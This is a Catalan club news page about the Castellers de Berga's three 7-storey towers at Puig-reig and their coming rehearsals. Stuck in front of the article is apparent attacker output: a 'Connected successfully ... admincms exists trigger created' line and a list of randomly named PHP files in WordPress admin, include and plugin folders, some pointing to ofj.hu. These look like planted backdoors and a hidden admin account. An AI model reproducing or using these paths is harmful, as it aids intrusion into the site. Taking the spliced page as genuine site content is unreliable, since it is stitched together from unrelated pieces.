Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?meta https://castellersdeberga.cat/wp-admin/menu-header-stream-stream-stream-ajax-ajax-ajax-response-private.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/credits-cron-ajax-response.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/maint/repair-private-cron-wp-ajax-response-ajax-stream.php https://castellersdeberga.cat/wp-content/plugins/LayerSlider/layerslider-stream-stream-cron-meta.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-private-meta-meta-stream-cron-private.php https://castellersdeberga.cat/wp-includes/Requests/Proxy-stream.php https://castellersdeberga.cat/wp-includes/blocks/query-meta-private.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Tres castells de 7 pisos a Puig-reig
 

Tres castells de 7 pisos a Puig-reig


Tres castells de 7 pisos a Puig-reigEls Castellers de Berga hem signat la millor actuació del que portem de temporada a la Festa Major de Puig-reig. A la Plaça Nova, hi hem descarregat tres castells de 7 pisos: el 3 de 7, el 4 de 7 i el 3 de 7 amb agulla. Aquest últim ha estat el primer que descarreguem aquesta temporada. Per finalitzar, hem descarregat, altra vegada, el pilar de 5. Una molt bona actuació amb un gruix important de camises. Puig-reig s’ha convertit en una actuació fixa al calendari dels Castellers de Berga, la setmana anterior dels Quatre Fuets.
Al municipi del sud del Berguedà, ens hi han acompanyat els Salats de Súria. Han fet una bona actuació descarregant el 3 de 6 amb agulla, el 2 de 6 i el 3 de 6.
Amb l’excel.lent actuació a Puig-reig, encarem de la millor manera la setmana que culminarà amb la Diada dels Quatre Fuets. Diumenge 27 de maig, a les 11.30h, diada gran a la Plaça de Sant Pere, a Berga. Castellers de Vilafranca, Capgrossos de Mataró i Castellers de Berga serem a la diada emmarcada a l’inici dels actes de La Patum.
Aquesta setmana hi haurà 3 assajos especials. Començarem dimarts 22 al Cine Catalunya. Divendres 25 de maig, hi haurà l’últim assaig de la Patum Infantil a les Places del Forn, Sant Joan i les Cols i acabarem amb un sopar i un assaig a la Plaça de les Cols, darrere del Cine Catalunya. Dissabte 26 de maig, a les 6 de la tarda, assaig general per la Diada dels Quatre Fuets, a la Plaça de les Cols. A més a més, el cap de setmana tindrem la visita de la penya bilbaïna Askapeña, amb qui vam teixir bons vincles l’agost del 2017 amb la visita a l’Aste Nagusia, a la capital del País Basc.